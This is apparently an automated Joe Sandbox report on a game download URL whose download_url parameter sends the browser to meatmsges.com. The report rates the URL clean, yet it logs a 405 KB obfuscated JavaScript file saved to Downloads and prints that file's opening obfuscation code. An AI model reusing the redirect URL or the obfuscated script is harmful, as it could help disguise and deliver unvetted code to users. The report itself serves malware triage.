Edit tour

Windows Analysis Report
http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com

Overview

General Information

Sample URL:	http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com
Analysis ID:	1524417
Infos:

Detection

Score:	0
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 4916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2540,i,13889271777353788833,17058743533629641007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49730 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49739 version: TLS 1.2

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49730 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: meatmsges.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://hub-res.selvas.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BAoeUus2xkm61dk&MD=oeKvmgLu HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BAoeUus2xkm61dk&MD=oeKvmgLu HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /market/fatalraid/en/hub.html?download_url=https://meatmsges.com HTTP/1.1Host: hub-res.selvas.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: hub-res.selvas.com
Source: global traffic	DNS traffic detected: DNS query: meatmsges.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: chromecache_45.2.dr	String found in binary or memory: http://hub-res.selvas.com/market/fatalraid/en/hub.html
Source: chromecache_45.2.dr	String found in binary or memory: http://hub-res.selvas.com/market/fatalraid/en/img/title.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49739 version: TLS 1.2

Source: classification engine

Classification label: clean0.win@18/6@6/7

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\Downloads\64b19808-2094-4b3b-a526-325965c491a2.tmp

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2540,i,13889271777353788833,17058743533629641007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2540,i,13889271777353788833,17058743533629641007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
meatmsges.com	185.172.129.102	true	false	unknown
www.google.com	142.250.186.132	true	false	unknown
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.18	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
s3-website-ap-northeast-1.amazonaws.com	52.219.162.147	true	false	unknown
windowsupdatebg.s.llnwi.net	87.248.204.0	true	false	unknown
hub-res.selvas.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://meatmsges.com/	false		unknown
http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://hub-res.selvas.com/market/fatalraid/en/img/title.jpg	chromecache_45.2.dr	false		unknown
http://hub-res.selvas.com/market/fatalraid/en/hub.html	chromecache_45.2.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.219.162.147	s3-website-ap-northeast-1.amazonaws.com	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.172.129.102	meatmsges.com	Russian Federation	204154	FIRST-SERVER-US-ASRU	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.6
192.168.2.15
192.168.2.14

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524417
Start date and time:	2024-10-02 18:43:28 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	CLEAN
Classification:	clean0.win@18/6@6/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.184.206, 74.125.133.84, 34.104.35.123, 192.229.221.95, 20.3.187.198, 199.232.214.172, 52.165.164.15, 93.184.221.240, 142.250.186.163, 142.250.185.110
Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\Downloads\64b19808-2094-4b3b-a526-325965c491a2.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32768), with no line terminators
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.055360670238739
Encrypted:	false
SSDEEP:	768:+iEpNVqADKsrtCGM8Uq+3Igg4QEJ6HXeF/WxePn7ZWhhKD/aey/dZd7YzTrgNGZq:EKQEJ6HXeZWEPjc9r
MD5:	EE586068A2DAD266DB3CC9FE92E28278
SHA1:	7ABEB153C7A1D56DE62D4AEC9A3219EA0C747769
SHA-256:	571D07CDD5950D78164C2D6B9D28C6360B84873FA15615944BD52031ADDA5F51
SHA-512:	742F7783119AA1AE0703A372C66FD45A0BEE0D1ABF2BE2C0215FC50E2D3225AAE41E054ABF91D9D76078AED725E1DFFEE183393BE9DE29D5183E8E87BC0146AF
Malicious:	false
Reputation:	low
Preview:	(function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)(parseInt(_0x17ba92(0x4aa))/(-0x425+0x10x1cae+-0x1886))+-parseInt(_0x17ba92(0x958))/(0x24c2+-0x4a-0x1b+-0x10x2c8c)(-parseInt(_0x17ba92(0x38a))/(-0x6de0x3+-0x20c7-0x1+0xc28-0x1))+-parseInt(_0x17ba92(0x991))/(0x1766+-0x70x3a1+0x207)+parseInt(_0x17ba92(0xb65))/(0x3-0x329+0x1-0x19c0+0x2342)(-parseInt(_0x17ba92(0x425))/(-0xfcd-0x1+-0x61d+-0x1350x8))+-parseInt(_0x17ba92(0x11a))/(0xb600x1+0x10550x1+-0x5c0x4d)+-parseInt(_0x17ba92(0x2b8))/(-0x8-0x405+-0x1fd0+-0x4e)(-parseInt(_0x17ba92(0x251))/(0x4de+0x2d-0x81+0x50x392));if(_0x145be0===_0x5aec0c)break;else _0x8342['push'](_0x8342['shift']());}catch(_0x3732be){_0x8342['push'](_0x8342['shift']());}}}(_0xb6da,-0x4b0d4+-0x1af34+0x10xe5fb4),(function(_0x25a907,_0x474f62){var _0x3d6f67=_0x2e99,_0x4905d0={'yDhCG':

C:\Users\user\Downloads\Unconfirmed 387418.crdownload

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	405933
Entropy (8bit):	5.1676059199348785
Encrypted:	false
SSDEEP:	6144:YtmEdkq+uqmUdQbADBXXr/6C8sPqe0gQNJ:DRXdcANrbwgQNJ
MD5:	5310A17ACD007CDBF59DA6227B8D6283
SHA1:	9202486EC46CEF0B79DB4628B7AF91005699A040
SHA-256:	2F0EA04EA13A7ED9A143A9EDD23B25FEC6D472827B0082C53F31F4E578FC6E06
SHA-512:	AD248FCA98633309A272F71A8156E601EEFB213161D2C0EAA1BE952F8DD1F5554E41CE05B1CDBA018559A95D0592041B91C9272C64070DE41084A0A79DB36F13
Malicious:	false
Reputation:	low
Preview:	(function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)(parseInt(_0x17ba92(0x4aa))/(-0x425+0x10x1cae+-0x1886))+-parseInt(_0x17ba92(0x958))/(0x24c2+-0x4a-0x1b+-0x10x2c8c)(-parseInt(_0x17ba92(0x38a))/(-0x6de0x3+-0x20c7-0x1+0xc28-0x1))+-parseInt(_0x17ba92(0x991))/(0x1766+-0x70x3a1+0x207)+parseInt(_0x17ba92(0xb65))/(0x3-0x329+0x1-0x19c0+0x2342)(-parseInt(_0x17ba92(0x425))/(-0xfcd-0x1+-0x61d+-0x1350x8))+-parseInt(_0x17ba92(0x11a))/(0xb600x1+0x10550x1+-0x5c0x4d)+-parseInt(_0x17ba92(0x2b8))/(-0x8-0x405+-0x1fd0+-0x4e)(-parseInt(_0x17ba92(0x251))/(0x4de+0x2d-0x81+0x50x392));if(_0x145be0===_0x5aec0c)break;else _0x8342['push'](_0x8342['shift']());}catch(_0x3732be){_0x8342['push'](_0x8342['shift']());}}}(_0xb6da,-0x4b0d4+-0x1af34+0x10xe5fb4),(function(_0x25a907,_0x474f62){var _0x3d6f67=_0x2e99,_0x4905d0={'yDhCG':

Chrome Cache Entry: 44

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	405933
Entropy (8bit):	5.1676059199348785
Encrypted:	false
SSDEEP:	6144:YtmEdkq+uqmUdQbADBXXr/6C8sPqe0gQNJ:DRXdcANrbwgQNJ
MD5:	5310A17ACD007CDBF59DA6227B8D6283
SHA1:	9202486EC46CEF0B79DB4628B7AF91005699A040
SHA-256:	2F0EA04EA13A7ED9A143A9EDD23B25FEC6D472827B0082C53F31F4E578FC6E06
SHA-512:	AD248FCA98633309A272F71A8156E601EEFB213161D2C0EAA1BE952F8DD1F5554E41CE05B1CDBA018559A95D0592041B91C9272C64070DE41084A0A79DB36F13
Malicious:	false
Reputation:	low
URL:	https://meatmsges.com/
Preview:	(function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)(parseInt(_0x17ba92(0x4aa))/(-0x425+0x10x1cae+-0x1886))+-parseInt(_0x17ba92(0x958))/(0x24c2+-0x4a-0x1b+-0x10x2c8c)(-parseInt(_0x17ba92(0x38a))/(-0x6de0x3+-0x20c7-0x1+0xc28-0x1))+-parseInt(_0x17ba92(0x991))/(0x1766+-0x70x3a1+0x207)+parseInt(_0x17ba92(0xb65))/(0x3-0x329+0x1-0x19c0+0x2342)(-parseInt(_0x17ba92(0x425))/(-0xfcd-0x1+-0x61d+-0x1350x8))+-parseInt(_0x17ba92(0x11a))/(0xb600x1+0x10550x1+-0x5c0x4d)+-parseInt(_0x17ba92(0x2b8))/(-0x8-0x405+-0x1fd0+-0x4e)(-parseInt(_0x17ba92(0x251))/(0x4de+0x2d-0x81+0x50x392));if(_0x145be0===_0x5aec0c)break;else _0x8342['push'](_0x8342['shift']());}catch(_0x3732be){_0x8342['push'](_0x8342['shift']());}}}(_0xb6da,-0x4b0d4+-0x1af34+0x10xe5fb4),(function(_0x25a907,_0x474f62){var _0x3d6f67=_0x2e99,_0x4905d0={'yDhCG':

Chrome Cache Entry: 45

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text
Category:	downloaded
Size (bytes):	1013
Entropy (8bit):	5.231155245231979
Encrypted:	false
SSDEEP:	12:r8YMMXUqpqqTBcMX99qlvCEAqgcMX99qukvCEoqZzqoMFrEPMFrEIDtfEcvHsJrQ:r8YMUUEq7U/dZqU/7t0ZzgzlCwVUg7H
MD5:	E90527E84CD2692DB7FE44B09FB177FA
SHA1:	79A5751F208558D61B73A08CD037BD9025F5E442
SHA-256:	6747F02848E61BC6ED64FFE5894C8A0CBF81909BDBAE332B80C4C612FAE9C774
SHA-512:	1DCA10B6207C2E1096F3537AD37C473324D099096A44532A75FE666F8C101E092E2186B183AA14B1D1A429CEEE21A52C5D7E31AEC6785E28CC9C443302CC45A3
Malicious:	false
Reputation:	low
URL:	http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com
